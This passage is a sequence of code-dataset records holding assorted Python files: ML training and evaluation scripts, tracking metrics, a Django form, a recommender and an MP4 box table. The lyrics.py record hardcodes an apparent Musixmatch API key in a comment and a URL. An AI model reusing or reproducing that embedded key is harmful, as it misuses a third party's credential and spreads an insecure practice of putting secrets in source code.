model.get_slot('train')\n predict = model.get_slot('predict')\n # 参数初始化\n session.run(tf.global_variables_initializer())\n # 开始训练\n for i in range(1, flags.nloop + 1):\n # 获取一个batch的数据\n images_batch, labels_batch = ds.next_batch(flags.bsize)\n # 输出训练交叉熵损失\n loss = train(images_batch, labels_batch)\n print('Loop {}:\\tloss= {}'.format(i, loss))\n # 输出在测试集上的accuracy\n accuracy = predict(ds.test_images, ds.test_labels)\n print('Accuracy on test set: {}'.format(accuracy))\n return 0\n\n\nif __name__ == '__main__':\n global_flags = gflags.FLAGS\n gflags.DEFINE_boolean('help', False, 'Show this help.')\n gflags.DEFINE_string('gpu', '0', 'Which GPU to use.')\n gflags.DEFINE_string('directory', './examples', 'Folder to save the origin data.')\n gflags.DEFINE_integer('input_size', 784, 'Dimension of input data.')\n gflags.DEFINE_integer('num_classes', 10, 'Number of classes.')\n gflags.DEFINE_integer('nloop', 1000, 'Number of loops.')\n gflags.DEFINE_integer('bsize', 100, 'Batch size.')\n global_flags(sys.argv)\n if global_flags.help:\n print(global_flags.main_module_help())\n exit(0)\n os.environ['CUDA_VISIBLE_DEVICES'] = global_flags.gpu\n exit(main(global_flags))\n","sub_path":"examples/mnist_softmax.py","file_name":"mnist_softmax.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"513345285","text":"import os, sys\nproject_root = os.path.join(os.path.expanduser('~'), 'Dev/NetModules')\nsys.path.append(project_root)\nimport matplotlib as mpl\n\nmpl.use('Agg')\nimport numpy as 
np\nimport pandas as pd\nimport pickle\nimport progressbar\nfrom ActionLocalizationDevs.PropEval.obselete import prop_eval_utils_mod as prop_eval_utils\n\n\n#\n# prediction_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/pkl_files/TURN-C3D-16_thumos14.pkl'\n# ground_truth_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/thumos14_test_groundtruth.csv'\n\n\n\ndef pkl_seconds2dataframe(frm_nums):\n data_frame = []\n # movie_fps = pickle.load(open(\"./movie_fps.pkl\"))\n # pkl_dir = \"./pkl_files/\"\n dt_results = pickle.load(open(prediction_file))\n pbar = progressbar.ProgressBar(max_value=len(dt_results))\n for i, _key in enumerate(dt_results):\n pbar.update(i)\n # fps = movie_fps[_key]\n frm_num = frm_nums[_key]\n for line in dt_results[_key]:\n start = int(line[0] * 30)\n end = int(line[1] * 30)\n score = float(line[2])\n data_frame.append([end, start, score, frm_num, _key])\n return data_frame\n\ndef pkl_frame2dataframe(frm_nums):\n data_frame = []\n # movie_fps = pickle.load(open(\"./movie_fps.pkl\"))\n # pkl_dir = \"./pkl_files/\"\n dt_results = pickle.load(open(prediction_file))\n pbar = progressbar.ProgressBar(max_value=len(dt_results))\n for i, _key in enumerate(dt_results):\n pbar.update(i)\n # fps = movie_fps[_key]\n frm_num = frm_nums[_key]\n for line in dt_results[_key]:\n start = int(line[0])\n end = int(line[1])\n score = float(line[2])\n data_frame.append([end, start, score, frm_num, _key])\n return data_frame\n\n\n# save_name = 'lstm2heads_0291'\nsave_name = 'TURN-FLOW-16'\nfreq=0.2\nframebased = False\n\nprediction_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/pkl_files/{:s}_thumos14.pkl'.format(save_name)\nground_truth_file = '/home/zwei/Dev/NetModules/ActionLocalizationDevs/PropEval/thumos14_test_groundtruth.csv'\nfrm_nums = pickle.load(open(\"./frm_num.pkl\"))\nif framebased:\n rows = pkl_frame2dataframe(frm_nums)\n\nelse:\n rows = pkl_seconds2dataframe(frm_nums)\n\ndaps_results = pd.DataFrame(rows, columns=['f-end', 'f-init', 'score', 'video-frames', 'video-name'])\n\n# Retrieves and loads Thumos14 test set ground-truth.\n# ground_truth_url = ('https://gist.githubusercontent.com/cabaf/'\n# 'ed34a35ee4443b435c36de42c4547bd7/raw/'\n# '952f17b9cdc6aa4e6d696315ba75091224f5de97/'\n# 'thumos14_test_groundtruth.csv')\n# s = requests.get(ground_truth_url).content\nground_truth = pd.read_csv(ground_truth_file, sep=' ')\n# Computes average recall vs average number of proposals.\n\n\nrecall_freq, tiou_thresholds_freq = prop_eval_utils.recall_freq_vs_tiou_thresholds(daps_results, ground_truth, frm_nums,\n pdefined_freq=freq)\n\n\n\n\nrecall_freq_pnt_file = \"./ref_pnt_pairs/{:s}_{:.2f}_recall_freq_pnt_pairs.npy\"\nnp.save(recall_freq_pnt_file.format(save_name, freq), np.array([tiou_thresholds_freq, recall_freq]))\n\n\n","sub_path":"Devs_ActionProp/PropEval/prop_eval_save2file_freq_only.py","file_name":"prop_eval_save2file_freq_only.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"184063569","text":"#!/usr/bin/env python3\nfrom controller import Controller\n\nclass Bkp1785bController(Controller):\n description = \"1785b Controller\"\n name = \"BKP 1785B\"\n devices = [\"bkp1785b\"]\n \n def add_args(self):\n self.parser.add_argument(\n \"-r\", \"--baud-rate\", default=None,\n required=True,\n help=\"baud rate (e.g. 
9600).\")\n    \ndef main():\n    controller = Bkp1785bController()\n    controller.loop()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"bkp1785b_controller.py","file_name":"bkp1785b_controller.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"614177493","text":"'''\nCreated on 26 Nov 2013\n\n@author: christina\n'''\nfrom django import forms\n\nfrom app.jobs import models\n\nclass PostJobForm(forms.ModelForm):\n    class Meta:\n        model = models.JobPost\n        fields = ['description', 'title', 'application_date', 'location',\n                  'job_categories']\n\n    def __init__(self, *args, **kwargs):\n        super(PostJobForm, self).__init__(*args, **kwargs)\n        \n        self.fields['title'].widget.attrs.update({'class': 'required'})\n        self.fields['application_date'].widget.attrs.update({'class': 'datepicker required'})\n        self.fields['description'].widget.attrs.update({\n            'cols': '50', 'rows': '2',\n            'class': 'required'\n        })\n","sub_path":"src/app/jobs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"33463428","text":"import numpy as np\nimport urllib2  # used by pull_lyrics below but missing from the original imports\n\n# Song.resp['foreign_ids'] is an array of dicts that are key:'foreign_id', value: 'musixmatch-WW:song:3957'\n# if 3957 is the ID of the song in musixmatch.\n\n# API Key: 3476eaa823bbdd8fc9b8fe89ee98c387\n\nLYRICS_BASE = 'http://api.musixmatch.com/ws/1.1/track.lyrics.get?apikey=3476eaa823bbdd8fc9b8fe89ee98c387'\n\ndef pull_lyrics(fids):\n\tif len(fids) == 0:\n\t\treturn []\n\n\tresponses = []\n\tfor f in fids:\n\t\tcode = int(f['foreign_id'].split(\":\")[-1])\n\t\tresponses.append(urllib2.urlopen(LYRICS_BASE+\"&track_id=\"+str(code)).read())\n\n\treturn responses","sub_path":"project/lyrics.py","file_name":"lyrics.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"430706851","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport plotPoints as pp\n\n#from scipy.spatial import Delaunay\n#import plotDelaunay\n\n# Two parameters need to be fixed: a distance epsilon and a number of\n# neighbours k. Given these parameters, the stars are classified into three\n# types:\n#\n# - Center type: the stars that have k or more neighbouring stars at a\n# distance <= epsilon.\n#\n# - Border type: the stars that have a center-type star at a distance\n# <= epsilon, but that do not meet the condition to be of center type.\n#\n# - Outlier type: the stars that are neither center nor border.\n#\n# Then, the border-type stars would be candidates to be part of the\n# boundary of a void. It still has to be worked out how to build the \"walls of\n# the voids\". 
An initial idea would be to do a triangulation and then mark\n# the edges between border-type stars, in order to define the voids.\n\ndef distance(x1,y1,x2,y2):\n    \"distance between (x1,y1) and (x2,y2)\"\n    deltaXSquare = (x1-x2)**2\n    deltaYSquare = (y1-y2)**2\n    return (deltaXSquare+deltaYSquare) ** (0.5)\n\nmanualEpsilon = False #Manual epsilon or calculated\nepsilon = 200 #epsilon is the distance to check for neighbours\nk = 12 #k is the number of neighbours in the epsilon-neighborhood criterion\nfile = 'Data/20irr2d_1024.dat' #File to be read\nplot = True #Plot?\nplotNearestNeighbour = True #Plot lines to epsilon-neighbours?\n\n#Parse the read data\nf = open(file, 'r')\ni = 0\nfirst = 0\nfor r in f:\n    if first == 0:\n        dimensions = int(r)\n        first += 1\n    elif first == 1:\n        l = int(r)\n        first += 1\n        raw = np.zeros((l,2))\n    else:\n        row = r.split()\n        raw[i,0] = float(row[0])\n        raw[i,1] = float(row[1])\n        i += 1\n\n\nM = np.zeros((l, l))\n\n#Filling distance Matrix M\nfor i in range(0,l):\n    for j in range(0,i):\n        dist = distance(raw[i,0],raw[i,1],raw[j,0],raw[j,1])\n        M[i,j] = dist\n        M[j,i] = dist\n\n\n#calculate epsilon depending on k: epsilon is the mean distance of the kth neighbour.\ndef epsilonForK(k,M,l):\n    kNearest = []\n    for i in range(0,l):\n        kNearest.append(sorted(M[i])[k+1])\n    return np.mean(kNearest)\n\nif not manualEpsilon:\n    epsilon = epsilonForK(k,M,l)\n\n#Ids\ncenter = []\noutlier = []\ncandidates = []\nborder = []\n\ncenterPointsPython = []\noutlierPointsPython = []\ncandidatesPointsPython = []\nborderPointsPython = []\n\nneighbourEdge_points = []\nneighbour_edges = set()\n\ndef add_edge(i, j):\n    \"\"\"Add a line between the i-th and j-th points, if not in the list already\"\"\"\n    if (i, j) in neighbour_edges or (j, i) in neighbour_edges:\n        return\n    neighbour_edges.add((i, j))\n    neighbourEdge_points.append(raw[ [i, j] ])\n\n#check for center objects.\nfor i in range(0,l):\n    nrNeigh = 0\n    for j in range(0,l):\n        if (M[i,j] <= epsilon) and i != j:\n            nrNeigh += 1\n            if plotNearestNeighbour:\n                add_edge(i,j)\n    if nrNeigh >= k:\n        centerPointsPython.append(raw[i].tolist())\n        center.append(i)\n    else:\n        candidates.append(i)\n        candidatesPointsPython.append(raw[i].tolist())\n\n#Move candidates from outlier to border\nfor cand in candidates:\n    wasBorder = False\n    for c in center:\n        if M[cand,c] <= epsilon:\n            border.append(cand)\n            borderPointsPython.append(raw[cand].tolist())\n            wasBorder = True\n            break\n    if not wasBorder:\n        outlier.append(cand)\n        outlierPointsPython.append(raw[cand].tolist())\n\nif plot:\n    plotName = 'Data:' + file + ' | epsilon:' + str(epsilon) + ' | k:' + str(k)\n    if plotNearestNeighbour:\n        pp.plotWithEpsilonNeighbour(plotName, centerPointsPython, outlierPointsPython, borderPointsPython,neighbourEdge_points)\n    else:\n        pp.plot(plotName, centerPointsPython, outlierPointsPython, borderPointsPython)\n","sub_path":"Voidfinding/Ordered.py","file_name":"Ordered.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"441026581","text":"import os\nimport numpy as np\nimport sys\nfrom scipy.optimize import linear_sum_assignment as linear_assignment\nfrom utils.utils import dict_to_list, bbox_overlap\n\ndef bilateral_weights(arr, gamma_col=12, gamma_pos=17):\n    \n    w_step = int(arr.shape[0]/2)\n    delta_c = abs(arr[w_step,w_step] - arr)/3  # colour difference w.r.t. the window's centre pixel\n    coordx, coordy = np.meshgrid(np.arange(-w_step,w_step+1),np.arange(-w_step,w_step+1))\n    delta_g = np.sqrt(coordx ** 2 + coordy ** 2)\n    weights = np.exp(-(delta_c)/gamma_col) 
* np.exp(-(delta_g)/gamma_pos)\n\n    return weights.flatten()\n\ndef dist_func(vec1, vec2, metric='ssd', weights=None):\n    \"\"\"\n    Compute global distance between two vectors\n    :param vec1, vec2: Two vectors\n    :return: Computed distance\n    \"\"\"\n    assert len(vec1) == len(vec2)\n    if weights is None:\n        weights = np.ones(vec1.shape)*(1/vec1.size)\n\n    if metric == 'ssd':\n        # Sum of Squared Distances\n        return sum(weights*(vec1 - vec2) ** 2)\n\n    elif metric == 'sad':\n        # Sum of Absolute Distances\n        return sum(np.abs(weights*(vec1 - vec2)))\n\n    elif metric == 'ncc':\n        #Normalized Cross Correlation\n        mean1 = np.sum(weights * vec1)\n        mean2 = np.sum(weights * vec2)\n        std1 = np.sqrt(np.sum(weights * (vec1 - mean1) ** 2))+(1e-15)\n        std2 = np.sqrt(np.sum(weights * (vec2 - mean2) ** 2))+(1e-15)\n        return np.sum(weights*(vec1-mean1)*(vec2-mean2))/(std1*std2)\n\ndef vec_error(gt, det, nchannel=2):\n    \"\"\"\n    Computes vectorial distance \n    :param gt: Ground truth vectors\n    :param det: Detection vectors\n    :return: Computed error\n    \"\"\"\n    dist = det[:, :, :nchannel] - gt[:, :, :nchannel]\n    error = np.sqrt(np.sum(dist ** 2, axis=2))\n\n    # discard vectors which come from occluded areas (occluded = 0)\n    non_occluded_idx = gt[:, :, 2] != 0\n\n    return error[non_occluded_idx], error\n\n\ndef compute_MSEN_PEPN(gt=None, det=None, error_noc=None, nchannel=2, th=3):\n    \"\"\"\n    Computes the error using the vectorial distance between gt and det\n    :param gt: Ground truth values\n    :param det: Detection values\n    :param error_noc: Precomputed non-occluded error values (optional)\n    :param nchannel: Number of channels per frame\n    :param th: threshold value to consider a distance as an error. \n    \"\"\"\n\n    # the dense error map is only available when it is computed here from gt/det\n    error = None\n    if error_noc is None:\n        assert gt is not None, 'gt is None'\n        assert det is not None, 'det is None'\n        error_noc, error = vec_error(gt, det, nchannel)\n\n    msen = np.mean(error_noc)\n    pepn = np.sum(error_noc > th) / len(error_noc)\n\n    return msen, pepn, error\n\ndef interpolate_bb(bb_first, bb_last, distance):\n    bb_first = np.array(bb_first)\n    bb_last = np.array(bb_last)\n    #interpolate the new bbox depending on the distance in frames between the first and last bbox\n    new_bb = bb_first + (bb_last-bb_first)/distance\n\n    return list(np.round(new_bb,2))\n\ndef compute_iou(bb_gt, bb, resize_factor=1):\n    \"\"\" \n    iou = compute_iou(bb_gt, bb)\n    Compute IoU between bboxes from ground truth and a single bbox.\n    bb_gt: Ground truth bboxes\n        Array of (num, bbox), num:number of boxes, bbox:(xmin,ymin,xmax,ymax)\n    bb: Detected bbox\n        Array of (bbox,), bbox:(xmin,ymin,xmax,ymax)\n    \"\"\"\n\n    # intersection\n    bb = bb / resize_factor\n\n    ixmin = np.maximum(bb_gt[:, 0], bb[0])\n    iymin = np.maximum(bb_gt[:, 1], bb[1])\n    ixmax = np.minimum(bb_gt[:, 2], bb[2])\n    iymax = np.minimum(bb_gt[:, 3], bb[3])\n    iw = np.maximum(ixmax - ixmin + 1., 0.)\n    ih = np.maximum(iymax - iymin + 1., 0.)\n    inters = iw * ih\n\n    # union\n    uni = ((bb[2] - bb[0] + 1.) * (bb[3] - bb[1] + 1.) +\n           (bb_gt[:, 2] - bb_gt[:, 0] + 1.) *\n           (bb_gt[:, 3] - bb_gt[:, 1] + 1.) 
- inters)\n\n return inters / uni\n\ndef compute_miou(gt_frame, dets_frame, resize_factor=1):\n \"\"\"\n Computes the mean iou by averaging the individual iou results.\n :param gt_frame: Ground truth bboxes\n :param dets_frame: list of detected bbox for each frame\n :return: Mean Intersection Over Union value, Standard Deviation of the IoU\n \"\"\"\n iou = []\n for det in dets_frame:\n iou.append(np.max(compute_iou(gt_frame, det, resize_factor)))\n\n return np.mean(iou), np.std(iou)\n\ndef compute_centroid(bb, resize_factor=1):\n \"\"\"\n Computes centroid of bb\n :param bb: Detected bbox\n :return: Centroid [x,y] \n \"\"\"\n # intersection\n bb = np.array(bb) / resize_factor\n # (xmax - xmin) / 2 \n x = (bb[2] + bb[0]) / 2\n # (ymax - ymin) / 2 \n y = (bb[3] + bb[1]) / 2\n \n return (int(x), int(y))\n\ndef compute_total_miou(gt, dets, frames):\n \"\"\"\n Computes miou for every frame being evaluated.\n :param gt: Ground truth bboxes \n :param dets: list of detected bbox \n :param frames: Frames names \n return: Return the total moiu for the given sequence by averaging the resutls\n \"\"\"\n\n miou = np.empty(0, )\n\n for frame in frames:\n if os.name == 'nt':\n frame = frame.replace(os.sep, '/')\n frame_id = (frame.split('/')[-1]).split('.')[0]\n\n if frame_id in gt.keys() and frame_id in dets.keys() and int(frame_id) > 210:\n gt_frame = np.array(dict_to_list(gt[frame_id], False))\n dets_frame = np.array(dict_to_list(dets[frame_id], False))\n\n miou = np.hstack((miou, compute_miou(gt_frame, dets_frame)[0]))\n\n return (np.sum(miou) / len(miou))\n\ndef voc_ap(rec, prec, use_07_metric=False):\n \"\"\" ap = voc_ap(rec, prec, [use_07_metric])\n Compute VOC AP given precision and recall.\n If use_07_metric is true, uses the\n VOC 07 11 point method (default:False).\n \"\"\"\n if use_07_metric:\n # 11 point metric\n ap = 0.\n for t in np.arange(0., 1.1, 0.1):\n if np.sum(rec >= t) == 0:\n p = 0\n else:\n p = np.max(prec[rec >= t])\n ap = ap + p / 11.\n else:\n # correct AP calculation\n # first append sentinel values at the end\n mrec = np.concatenate(([0.], rec, [1.]))\n mpre = np.concatenate(([0.], prec, [0.]))\n\n # compute the precision envelope\n for i in range(mpre.size - 1, 0, -1):\n mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])\n\n # to calculate area under PR curve, look for points\n # where X axis (recall) changes value\n i = np.where(mrec[1:] != mrec[:-1])[0]\n\n # and sum (\\Delta recall) * prec\n ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])\n return ap\n\ndef voc_eval(recs,\n imagenames,\n dets,\n classname='car',\n ovthresh=0.5,\n resize_factor=1,\n use_07_metric=False):\n \"\"\"rec, prec, ap = voc_eval(recs,\n imagenames,\n dets,\n classname,\n [ovthresh],\n [use_07_metric])\n Top level function that does the PASCAL VOC evaluation.\n gt_dir: Path to ground truth\n det_dir: Path to detections\n img_dir: Path to images\n det_model : Detection model name\n Name of the txt file where detections are written\n classname: Category name (car)\n [ovthresh]: Overlap threshold (default = 0.5)\n [use_07_metric]: Whether to use VOC07's 11 point AP computation\n (default False)\n \"\"\"\n # assumes detections are in detpath.format(classname)\n # assumes annotations are in annopath.format(imagename)\n # assumes imagesetfile is a text file with each line an image name\n\n # extract gt objects for this class\n class_recs = {}\n npos = 0\n for imagename in imagenames:\n if os.name == 'nt':\n imagename = imagename.replace(os.sep, '/')\n\n imgname = (imagename.split('/')[-1]).split('.')[0]\n 
try:\n R = [obj for obj in recs[imgname] if obj['name'] == classname]\n except:\n continue\n bbox = np.array([x['bbox'] for x in R])\n det = [False] * len(R)\n npos += len(R)\n class_recs[imgname] = {'bbox': bbox,\n 'det': det}\n\n image_ids = [frame for frame, objs in dets.items() for _ in objs if frame in class_recs.keys()]\n confidence = np.array(\n [obj['confidence'] for frame, objs in dets.items() for obj in objs if frame in class_recs.keys()])\n BB = np.array([obj['bbox'] for frame, objs in dets.items() for obj in objs if frame in class_recs.keys()])\n\n # sort by confidence\n sorted_ind = np.argsort(-confidence)\n sorted_scores = np.sort(-confidence)\n BB = BB[sorted_ind]\n image_ids = [image_ids[x] for x in sorted_ind]\n\n # go down dets and mark TPs and FPs\n nd = len(image_ids)\n tp = np.zeros(nd)\n fp = np.zeros(nd)\n for d in range(nd):\n R = class_recs[image_ids[d]]\n bb = BB[d, :].astype(float)\n ovmax = -np.inf\n BBGT = R['bbox'].astype(float)\n\n if BBGT.size > 0:\n # compute overlaps\n overlaps = compute_iou(BBGT, bb, resize_factor)\n\n ovmax = np.max(overlaps)\n jmax = np.argmax(overlaps)\n\n if ovmax > ovthresh:\n if not R['det'][jmax]:\n tp[d] = 1.\n R['det'][jmax] = 1\n else:\n fp[d] = 1.\n else:\n fp[d] = 1.\n\n # compute precision recall\n fp = np.cumsum(fp)\n tp = np.cumsum(tp)\n rec = tp / float(npos)\n # avoid divide by zero in case the first detection matches a difficult\n # ground truth\n prec = tp / np.maximum(tp + fp, np.finfo(np.float64).eps)\n ap = voc_ap(rec, prec, use_07_metric)\n\n return rec, prec, ap\n\ndef IDF1(gtDB, stDB, threshold = 0.5):\n \"\"\"\n compute IDF1 metric\n :param gtDB: list with the information of the detections in gt\n :param stDB: list with the information of the detections predicted\n :param threshold: thr to determine if the prediction is FP or FN\n :return: IDF1 (in %)\n \"\"\"\n st_ids = np.unique(stDB[:, 1])\n gt_ids = np.unique(gtDB[:, 1])\n n_st = len(st_ids)\n n_gt = len(gt_ids)\n groundtruth = [gtDB[np.where(gtDB[:, 1] == gt_ids[i])[0], :]\n for i in range(n_gt)]\n prediction = [stDB[np.where(stDB[:, 1] == st_ids[i])[0], :]\n for i in range(n_st)]\n cost = np.zeros((n_gt + n_st, n_st + n_gt), dtype=float)\n cost[n_gt:, :n_st] = sys.maxsize # float('inf')\n cost[:n_gt, n_st:] = sys.maxsize # float('inf')\n\n fp = np.zeros(cost.shape)\n fn = np.zeros(cost.shape)\n # cost matrix of all trajectory pairs\n cost_block, fp_block, fn_block = cost_between_gt_pred(\n groundtruth, prediction, threshold)\n\n cost[:n_gt, :n_st] = cost_block\n fp[:n_gt, :n_st] = fp_block\n fn[:n_gt, :n_st] = fn_block\n\n # computed trajectory match no groundtruth trajectory, FP\n for i in range(n_st):\n cost[i + n_gt, i] = prediction[i].shape[0]\n fp[i + n_gt, i] = prediction[i].shape[0]\n\n # groundtruth trajectory match no computed trajectory, FN\n for i in range(n_gt):\n cost[i, i + n_st] = groundtruth[i].shape[0]\n fn[i, i + n_st] = groundtruth[i].shape[0]\n try:\n matched_indices = linear_assignment(cost)\n except:\n import pdb\n pdb.set_trace()\n nbox_gt = sum([groundtruth[i].shape[0] for i in range(n_gt)])\n nbox_st = sum([prediction[i].shape[0] for i in range(n_st)])\n\n IDFP = 0\n IDFN = 0\n for matched in zip(*matched_indices):\n IDFP += fp[matched[0], matched[1]]\n IDFN += fn[matched[0], matched[1]]\n IDTP = nbox_gt - IDFN\n assert IDTP == nbox_st - IDFP\n # IDF1 = 2 * IDTP / (2 * IDTP + IDFP + IDFN)\n IDF1 = 2 * IDTP / (nbox_gt + nbox_st) * 100\n\n return IDF1\n\ndef corresponding_frame(traj1, len1, traj2, len2):\n \"\"\"\n Find the matching 
position in traj2 with respect to traj1\n    Assume both trajectories are in ascending frame ID\n    :param traj1, traj2: trajectories (gt and estimated, respectively)\n    :return: the location of the bbox in the new frame \n    \"\"\"\n    p1, p2 = 0, 0\n    loc = -1 * np.ones((len1, ), dtype=int)\n    while p1 < len1 and p2 < len2:\n        if traj1[p1] < traj2[p2]:\n            loc[p1] = -1\n            p1 += 1\n        elif traj1[p1] == traj2[p2]:\n            loc[p1] = p2\n            p1 += 1\n            p2 += 1\n        else:\n            p2 += 1\n    return loc\n\ndef cost_between_trajectories(traj1, traj2, threshold):\n    \"\"\"\n    Compute the FP and FN matchings\n    :param traj1, traj2: trajectories (gt and estimated, respectively)\n    :param threshold: threshold used to determine if it is FP or FN\n    :return: number of FP and FN\n    \"\"\"\n    [npoints1, dim1] = traj1.shape\n    [npoints2, dim2] = traj2.shape\n    # find start and end frame of each trajectory\n    start1 = traj1[0, 0]\n    end1 = traj1[-1, 0]\n    start2 = traj2[0, 0]\n    end2 = traj2[-1, 0]\n\n    # check frame overlap\n    has_overlap = max(start1, start2) < min(end1, end2)\n    if not has_overlap:\n        fn = npoints1\n        fp = npoints2\n        return fp, fn\n\n    # gt trajectory mapping to st, check gt missed\n    matched_pos1 = corresponding_frame(\n        traj1[:, 0], npoints1, traj2[:, 0], npoints2)\n    # st trajectory mapping to gt, check computed one false alarms\n    matched_pos2 = corresponding_frame(\n        traj2[:, 0], npoints2, traj1[:, 0], npoints1)\n    dist1 = compute_distance(traj1, traj2, matched_pos1)\n    dist2 = compute_distance(traj2, traj1, matched_pos2)\n    # FN\n    fn = sum([1 for i in range(npoints1) if dist1[i] < threshold])\n    # FP\n    fp = sum([1 for i in range(npoints2) if dist2[i] < threshold])\n    return fp, fn\n\ndef compute_distance(traj1, traj2, matched_pos):\n    \"\"\"\n    Compute the per-frame IoU of traj2 with respect to traj1\n    :param traj1, traj2: trajectories (gt and estimated, respectively)\n    :param matched_pos: positions matched\n    :return: the IoU between both trajectories at the matched positions\n    \"\"\"\n    distance = np.zeros((len(matched_pos), ), dtype=float)\n    for i in range(len(matched_pos)):\n        if matched_pos[i] == -1:\n            continue\n        else:\n            iou = bbox_overlap(traj1[i, 2:6], traj2[matched_pos[i], 2:6])\n            distance[i] = iou\n    return distance\n\ndef cost_between_gt_pred(groundtruth, prediction, threshold):\n    \"\"\"\n    Compute cost between detections in gt and in prediction\n    :param groundtruth: gt information\n    :param prediction: predicted information\n    :param threshold: thr used to determine if FP or FN\n    :return: the cost, FP and FN\n    \"\"\"\n    n_gt = len(groundtruth)\n    n_st = len(prediction)\n    cost = np.zeros((n_gt, n_st), dtype=float)\n    fp = np.zeros((n_gt, n_st), dtype=float)\n    fn = np.zeros((n_gt, n_st), dtype=float)\n    for i in range(n_gt):\n        for j in range(n_st):\n            fp[i, j], fn[i, j] = cost_between_trajectories(\n                groundtruth[i], prediction[j], threshold)\n            cost[i, j] = fp[i, j] + fn[i, j]\n    return cost, fp, fn","sub_path":"Week4/src/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":14877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"541124236","text":"import math\nfrom operator import *\nfrom collections import defaultdict\n\n\ndef defItemIndex(DictUser):\n    DictItem={}\n    ## iterate over every user\n    for user, item_s in DictUser.items(): # for each user and the items they purchased\n        for each_item in item_s: # for every item this user has purchased\n            if each_item not in DictItem:\n                DictItem[each_item] = set() # dict of sets: keyed by item, the inner set holds the users who bought it\n            DictItem[each_item].add(user)\n    return DictItem\n\n\ndef defUserSimilarity(DictItem):\n    # calculate co-rated items between users\n    C = dict()\n    
N = defaultdict(int) # count how many items each user has bought\n    for i, users in DictItem.items():\n        for u in users:\n            N[u]+=1\n            for v in users:\n                if u == v:\n                    continue\n                C.setdefault(u, defaultdict(int))\n                C[u][v] += 1\n    # calculate the final similarity matrix W\n    for u, related_users in C.items():\n        for v, cuv in related_users.items():\n            C[u][v] = cuv / math.sqrt(N[u] * N[v])\n    return C  # return the whole similarity matrix, not just the last entry\n\n\ndef Recommend(user,train,W2,K):\n    rank = dict()\n    interacted_items = train[user]\n    for v, wuv in sorted(W2[user].items(), key=itemgetter(1), reverse=True)[:K]:\n        for i, rvi in train[v].items():\n            if i in interacted_items:\n                continue\n            rank[i] = rank.get(i, 0) + wuv * rvi\n    return rank\n\n\nif __name__ == '__main__':\n    Train_Data = {'A':{'i1':1,'i2':1 ,'i4':1},\n                  'B':{'i1':1,'i4':1},\n                  'C':{'i1':1,'i2':1,'i5':1},\n                  'D':{'i2':1,'i3':1},\n                  'E':{'i3':1,'i5':1},\n                  'F':{'i2':1,'i4':1}\n                  }\n    Ditem=defItemIndex(Train_Data)\n    print(Ditem)\n    W=defUserSimilarity(Ditem)\n    print(W)\n    print(Recommend('D',Train_Data,W,2))\n","sub_path":"CuiLinClass/MyCode/BaseOnUser.py","file_name":"BaseOnUser.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}{"seq_id":"490099715","text":"import os\nimport struct\n\nFLAG_PRINT_DESC = 0x01\nFLAG_PRINT_SIZE_INFO = 0x02\n\ng_printLvlTab = '    '\ng_printFlags = 0x00\ng_maxLevel = 100\ng_leafInfo = False\ng_trackType = None\ng_listLimit = 10\n\n# tags = [isLeaf (True/False), isFullBoxType (True/False), desc]\ntags = {\n    'ftyp' : [True, False, 'file type and compatibility'],\n    'pdin' : [True, False, 'progressive download information'],\n    'moov' : [False, False, 'container for all metadata'],\n    'mvhd' : [True, True, 'movie header, overall declarations'],\n    'trak' : [False, False, 'container for an individual track or stream'],\n    'tkhd' : [True, True, 'track header, overall information about the track'],\n    'tref' : [True, False, 'track reference container'],\n    'edts' : [False, False, 'edit list container'],\n    'elst' : [True, False, 'an edit list'],\n    'mdia' : [False, False, 'container for the media information in a track'],\n    'mdhd' : [True, True, 'media header, overall information about the media'],\n    'hdlr' : [True, True, 'handler, declares the media (handler) type'],\n    'minf' : [False, False, 'media information container'],\n    'vmhd' : [True, True, 'video media header, overall information (video track only)'],\n    'smhd' : [True, True, 'sound media header, overall information (sound track only)'],\n    'hmhd' : [True, True, 'hint media header, overall information (hint track only)'],\n    'nmhd' : [True, True, 'null media header, overall information (some tracks only)'],\n    'dinf' : [False, False, 'data information box, container'],\n    'dref' : [True, True, 'data reference box, declares source(s) of media data in track'],\n    'stbl' : [False, False, 'sample table box, container for the time/space map'],\n    'stsd' : [True, True, 'sample descriptions (codec types, initialization etc.)'],\n    'stts' : [True, True, '(decoding) time-to-sample'],\n    'ctts' : [True, True, '(composition) time to sample'],\n    'stsc' : [True, True, 'sample-to-chunk, partial data-offset information'],\n    'stsz' : [True, True, 'sample sizes (framing)'],\n    'stz2' : [True, True, 'compact sample sizes (framing)'],\n    'stco' : [True, True, 'chunk offset, partial data-offset information'],\n    'co64' : [True, True, '64-bit chunk offset'],\n    'stss' : [True, True, 'sync sample table (random access points)'],\n    'stsh' : [True, False, 'shadow sync sample table'],\n    'padb' : [True, False, 'sample padding 
